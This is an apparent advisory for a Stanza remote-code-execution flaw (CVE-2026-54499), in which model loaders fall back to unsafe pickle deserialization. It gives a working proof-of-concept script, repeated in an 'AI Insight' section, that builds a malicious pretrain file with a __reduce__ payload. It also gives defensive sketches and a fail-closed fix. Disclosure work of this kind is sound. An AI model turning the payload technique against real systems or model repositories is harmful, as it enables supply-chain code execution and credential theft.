VYPR
High severity 7.5 · NVD Advisory · Published Jun 19, 2026 · Updated Jun 19, 2026

Stanza: Remote Code Execution via Unsafe Pickle Deserialization in Model Loaders

CVE-2026-54499

Description

Summary

Stanza 1.12.0 attempts to load PyTorch checkpoint files safely with torch.load(..., weights_only=True), but automatically falls back to the fully unsafe torch.load(..., weights_only=False) when the safe load raises pickle.UnpicklingError. That condition is fully attacker-controllable: any .pt file containing a single unsupported pickle global triggers it.

An attacker who can place a malicious pretrain or model file on disk (via supply-chain compromise, a poisoned model repository, or a shared model cache) can achieve arbitrary code execution on any machine that loads a Stanza NLP pipeline.

Code execution occurs inside the Stanza pretrain-loading API, not merely by calling torch.load directly.

Details

The vulnerable code is in pretrain.py#L59-L67 (Stanza 1.12.0):

try:
    data = torch.load(self.filename, lambda storage, loc: storage, weights_only=True)
except UnpicklingError:
    data = torch.load(self.filename, lambda storage, loc: storage, weights_only=False)

When weights_only=True is passed, PyTorch's deserializer raises pickle.UnpicklingError for any object whose class or callable is not on the safe-globals allowlist. This is the intended safety mechanism. However, Stanza catches that exception and immediately reloads the same attacker-controlled file with weights_only=False. That second call invokes Python's full pickle deserializer, which calls whatever callables the file's pickle stream names (for example, one recorded by a malicious __reduce__ method) without restriction.

The fallback is triggered reliably and intentionally: an attacker embeds one unsupported pickle global (e.g., builtins.open) anywhere in an otherwise structurally valid Stanza pretrain state dict. The safe load rejects it; the unsafe reload runs it.
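The fail-open behaviour can be reproduced without PyTorch. The following is a minimal sketch using only the standard library's pickle module; RestrictedUnpickler, ALLOWED_GLOBALS, safe_load, fail_open_load, and Marker are hypothetical names introduced for illustration, and the allowlist is only a stand-in for PyTorch's safe-globals list, not a copy of it. The payload calls the harmless builtin pow so that the effect is visible in the loaded value.

```python
import io
import pickle

# Hypothetical allowlist standing in for PyTorch's safe-globals list.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    """Rejects every global that is not explicitly allowlisted."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"unsupported global: {module}.{name}")


def safe_load(blob):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def fail_open_load(blob):
    """The anti-pattern: retry with the unrestricted unpickler on rejection."""
    try:
        return safe_load(blob)
    except pickle.UnpicklingError:
        return pickle.loads(blob)  # calls whatever callable the stream names


class Marker:
    def __reduce__(self):
        # At save time this records "call pow(2, 10)" in the pickle stream.
        return (pow, (2, 10))


blob = pickle.dumps({"weights": [0.0, 1.0], "extra": Marker()})

try:
    safe_load(blob)
    safe_result = "loaded"
except pickle.UnpicklingError as exc:
    safe_result = f"rejected: {exc}"

print(safe_result)            # the restricted load refuses the stream
print(fail_open_load(blob))   # the fallback has called pow(2, 10)
```

The restricted loader does its job; the damage comes entirely from the except branch, which hands the same bytes to an unrestricted loader.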

The same try/except pattern appears in at least five call sites across Stanza 1.12.0, including the pretrain.py site shown above:

| File | Lines |
|------|-------|
| stanza/models/common/pretrain.py | 64–66 |
| stanza/models/coref/model.py | 251–253, 329–331 |
| stanza/models/classifiers/trainer.py | 80–82 |
| stanza/models/constituency/base_trainer.py | 94–96 |

Additionally, stanza/models/lemma_classifier/base_model.py:127 calls torch.load(filename, lambda storage, loc: storage) with no weights_only argument at all, which defaults to False on any PyTorch < 2.6.
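Call sites like these can be located mechanically. The sketch below is one possible audit helper, not part of Stanza or PyTorch: find_unsafe_torch_loads and SAMPLE are hypothetical names, and the check only recognises calls written literally as torch.load(...), so aliased imports such as `from torch import load` would be missed.

```python
import ast


def find_unsafe_torch_loads(source, filename="<string>"):
    """Return (line, reason) pairs for torch.load calls not pinned to weights_only=True."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        is_torch_load = (
            isinstance(func, ast.Attribute)
            and func.attr == "load"
            and isinstance(func.value, ast.Name)
            and func.value.id == "torch"
        )
        if not is_torch_load:
            continue
        keyword = next((k for k in node.keywords if k.arg == "weights_only"), None)
        if keyword is None:
            findings.append((node.lineno, "weights_only not set"))
        elif not (isinstance(keyword.value, ast.Constant) and keyword.value.value is True):
            findings.append((node.lineno, "weights_only is not the literal True"))
    return sorted(findings)


# Illustrative input that mirrors the two patterns described above.
SAMPLE = '''
try:
    data = torch.load(path, map_location, weights_only=True)
except UnpicklingError:
    data = torch.load(path, map_location, weights_only=False)
other = torch.load(path, map_location)
'''

for line, reason in find_unsafe_torch_loads(SAMPLE):
    print(f"line {line}: {reason}")
```

Running the helper over each file in a source tree gives a starting list for review; it does not replace reading the surrounding exception handling.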

The call chain from the public API to the vulnerable fallback is:

stanza.models.common.foundation_cache.load_pretrain(path)
  → FoundationCache.load_pretrain(path)
    → stanza.models.common.pretrain.Pretrain(filename)
      → Pretrain.emb  (property access triggers load)
        → Pretrain.load()
          → torch.load(..., weights_only=True)   # raises UnpicklingError
          → torch.load(..., weights_only=False)  # executes arbitrary pickle
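The chain shows that deserialization is deferred until the emb property is read. A minimal sketch of that lazy-loading shape, assuming a loader function is injected so the example runs without PyTorch; LazyPretrain and fake_loader are hypothetical stand-ins, not Stanza's actual classes:

```python
class LazyPretrain:
    """Hypothetical stand-in for an object that defers file loading."""

    def __init__(self, filename, loader):
        self.filename = filename
        self._loader = loader  # injected so the sketch runs without PyTorch
        self._emb = None

    @property
    def emb(self):
        # The first access is what actually reads and deserializes the file.
        if self._emb is None:
            self._emb = self._loader(self.filename)
        return self._emb


calls = []


def fake_loader(filename):
    calls.append(filename)
    return [[0.0, 0.0]]


pretrain = LazyPretrain("vectors.pt", fake_loader)
calls_after_init = list(calls)    # constructing the object loads nothing
_ = pretrain.emb                  # first access triggers the load
_ = pretrain.emb                  # later accesses reuse the cached value
calls_after_access = list(calls)
```

With this shape, any validation of the file has to happen before the first property access, because constructing the object alone never touches the file.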

---

PoC

Environment: Python 3.11, stanza==1.12.0, torch==2.12.0

Step 1: Install dependencies:

pip install stanza==1.12.0 torch==2.12.0

Step 2: Save the following as exploit.py:

import os
from pathlib import Path

import torch
import stanza
from stanza.models.common.foundation_cache import FoundationCache, load_pretrain
from stanza.models.common.vocab import VOCAB_PREFIX

SENTINEL = "/tmp/stanza_rce_proof"
MODEL    = "/tmp/stanza_malicious.pt"

class HarmlessPayload:
    """Demonstrates execution; writes a sentinel file."""
    def __init__(self, path):
        self.path = path
    def __reduce__(self):
        return (open, (self.path, "w"))

# Build a structurally valid Stanza pretrain state dict with the payload embedded.
words = VOCAB_PREFIX + ["hello"]
state = {
    "vocab": {
        "lang": "", "idx": 0, "cutoff": 0, "lower": False,
        "_id2unit": words,
        "_unit2id": {w: i for i, w in enumerate(words)},
    },
    "emb": torch.zeros((len(words), 2), dtype=torch.float32),
    "payload": HarmlessPayload(SENTINEL),   # ← the malicious object
}
torch.save(state, MODEL)

# Confirm safe-only load raises UnpicklingError and does NOT create sentinel.
try:
    torch.load(MODEL, lambda s, l: s, weights_only=True)
    print("UNEXPECTED: safe load succeeded (no fallback needed)")
except Exception as e:
    print(f"Control: safe load raised {type(e).__name__} : sentinel exists: {Path(SENTINEL).exists()}")

# Load through the real Stanza API. The fallback fires and the sentinel is created.
cache   = FoundationCache()
pretrain = load_pretrain(MODEL, foundation_cache=cache)

print(f"stanza={stanza.__version__}  torch={torch.__version__}")
print(f"emb_shape={tuple(pretrain.emb.shape)}")
print(f"sentinel_exists={Path(SENTINEL).exists()}")
print("VERDICT: ACTUAL_VULN_REAL_STANZA_PATH" if Path(SENTINEL).exists() else "VERDICT: UNPROVEN")

Step 3: Run:

python exploit.py

Expected output (confirmed):

Control: safe load raised UnpicklingError : sentinel exists: False
stanza=1.12.0  torch=2.12.0
emb_shape=(5, 2)
sentinel_exists=True
VERDICT: ACTUAL_VULN_REAL_STANZA_PATH

The sentinel is created exclusively by the Stanza pretrain-loading API invoking the unsafe fallback, not by a direct torch.load call in the PoC.

---

Impact

Vulnerability class: CWE-502: Deserialization of Untrusted Data

Who is impacted: Any user, researcher, CI/CD pipeline, or production NLP service that loads a Stanza model or pretrain file from a source that is not under the victim's exclusive cryptographic control. Concretely:

  • Developers who run stanza.Pipeline(lang) after downloading models from HuggingFace or GitHub
  • CI pipelines that automatically refresh Stanza models during builds
  • Research environments that share pretrain files over shared network storage or model repositories

Attack prerequisites: The attacker must be able to place a malicious .pt pretrain file at a path that Stanza will load. Realistic delivery vectors include:

  • Compromise of a HuggingFace model repository hosting Stanza pretrain weights
  • Poisoning of a shared model cache directory (NFS, S3, artifact store)
  • A malicious pretrain file distributed via a third-party fine-tuning hub or research repo

What an attacker achieves: Arbitrary code execution with the full privileges of the process running stanza.Pipeline(), typically a developer workstation, a Jupyter notebook server, or a GPU training node. This allows credential theft (HuggingFace tokens, cloud IAM keys from environment variables), persistent backdoors, data exfiltration, and lateral movement in multi-tenant training infrastructure.

Recommended fix:

Remove the unsafe fallback entirely. If weights_only=True raises UnpicklingError, fail closed:

try:
    data = torch.load(self.filename, lambda storage, loc: storage, weights_only=True)
except UnpicklingError as e:
    raise RuntimeError(
        f"Refusing to load legacy pretrain file {self.filename!r} with unsafe "
        "deserialization. Regenerate the file using a trusted Stanza migration tool."
    ) from e

If legacy NumPy-containing pretrain files must be supported, use PyTorch's torch.serialization.add_safe_globals() API to allowlist only the specific NumPy dtypes required, rather than disabling all safety checks. Apply the same fix to all six affected call sites listed above.
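The principle of widening an allowlist for specific types while still failing closed can be illustrated with the standard library alone. This is an analogue built on pickle.Unpickler.find_class, not PyTorch's implementation; load_fail_closed, extra_allowed, and Payload are hypothetical names, and collections.OrderedDict merely plays the role of a legacy type that a trusted file might need.

```python
import collections
import io
import pickle


def load_fail_closed(blob, extra_allowed=()):
    """Unpickle blob, permitting only the globals listed in extra_allowed."""
    allowed = {(obj.__module__, obj.__qualname__): obj for obj in extra_allowed}

    class AllowlistUnpickler(pickle.Unpickler):
        def find_class(self, module, name):
            try:
                return allowed[(module, name)]
            except KeyError:
                raise pickle.UnpicklingError(
                    f"global {module}.{name} is not allowlisted"
                ) from None

    try:
        return AllowlistUnpickler(io.BytesIO(blob)).load()
    except pickle.UnpicklingError as exc:
        # No retry with an unrestricted loader: surface the rejection instead.
        raise RuntimeError(f"refusing to load untrusted pickle: {exc}") from exc


# A "legacy" payload that needs exactly one extra global.
legacy = pickle.dumps(collections.OrderedDict(a=1))
restored = load_fail_closed(legacy, extra_allowed=[collections.OrderedDict])
print(restored)
```

Allowlisting one type does not open the door to others: a stream that names any other global is still rejected with RuntimeError, which is the property the unsafe fallback throws away.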

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability mechanics

Root cause

"Stanza catches `pickle.UnpicklingError` from `torch.load(..., weights_only=True)` and falls back to the fully unsafe `torch.load(..., weights_only=False)`, allowing an attacker-controlled pickle payload to execute arbitrary code."

Attack vector

An attacker who can place a malicious `.pt` pretrain file on disk (via supply-chain compromise, a poisoned model repository, or a shared model cache) triggers arbitrary code execution. The file embeds a single unsupported pickle global (e.g., `builtins.open`) in an otherwise valid Stanza state dict. When Stanza's `Pretrain.load()` calls `torch.load(..., weights_only=True)`, PyTorch raises `pickle.UnpicklingError`; the catch block then reloads the same file with `weights_only=False`, executing any `__reduce__` method in the payload without restriction. [ref_id=1] [ref_id=2]

Affected code

The vulnerable code is in `stanza/models/common/pretrain.py` lines 59–67, where a `try/except UnpicklingError` block falls back to unsafe deserialization. The same pattern exists in `stanza/models/coref/model.py` (lines 251–253, 329–331), `stanza/models/classifiers/trainer.py` (lines 80–82), and `stanza/models/constituency/base_trainer.py` (lines 94–96). Additionally, `stanza/models/lemma_classifier/base_model.py:127` calls `torch.load` with no `weights_only` argument at all, defaulting to `False` on PyTorch < 2.6. [ref_id=1]

What the fix does

The patch must remove the unsafe fallback entirely. When `weights_only=True` raises `UnpicklingError`, the code should fail closed by raising a `RuntimeError` that refuses to load the file with unsafe deserialization. If legacy NumPy-containing pretrain files must be supported, PyTorch's `add_safe_globals()` API should be used to allowlist only the specific NumPy dtypes required, rather than disabling all safety checks. The same fix must be applied to all six affected loaders listed in the advisory. [ref_id=1]

Preconditions

  • Input: The attacker must be able to place a malicious .pt pretrain file at a path that Stanza will load (e.g., via compromised model repository, shared cache, or third-party hub).
  • Config: The victim must invoke a Stanza API that triggers the vulnerable model loader, such as stanza.Pipeline(lang) or load_pretrain().

Reproduction

```python
import os
from pathlib import Path

import torch
import stanza
from stanza.models.common.foundation_cache import FoundationCache, load_pretrain
from stanza.models.common.vocab import VOCAB_PREFIX

SENTINEL = "/tmp/stanza_rce_proof"
MODEL = "/tmp/stanza_malicious.pt"

class HarmlessPayload:
    """Demonstrates execution; writes a sentinel file."""
    def __init__(self, path):
        self.path = path
    def __reduce__(self):
        return (open, (self.path, "w"))

words = VOCAB_PREFIX + ["hello"]
state = {
    "vocab": {
        "lang": "", "idx": 0, "cutoff": 0, "lower": False,
        "_id2unit": words,
        "_unit2id": {w: i for i, w in enumerate(words)},
    },
    "emb": torch.zeros((len(words), 2), dtype=torch.float32),
    "payload": HarmlessPayload(SENTINEL),
}
torch.save(state, MODEL)

try:
    torch.load(MODEL, lambda s, l: s, weights_only=True)
    print("UNEXPECTED: safe load succeeded (no fallback needed)")
except Exception as e:
    print(f"Control: safe load raised {type(e).__name__} : sentinel exists: {Path(SENTINEL).exists()}")

cache = FoundationCache()
pretrain = load_pretrain(MODEL, foundation_cache=cache)

print(f"stanza={stanza.__version__}  torch={torch.__version__}")
print(f"emb_shape={tuple(pretrain.emb.shape)}")
print(f"sentinel_exists={Path(SENTINEL).exists()}")
print("VERDICT: ACTUAL_VULN_REAL_STANZA_PATH" if Path(SENTINEL).exists() else "VERDICT: UNPROVEN")
```

Expected output: `sentinel_exists=True` and `VERDICT: ACTUAL_VULN_REAL_STANZA_PATH`. [ref_id=1]

Generated on Jun 19, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

2
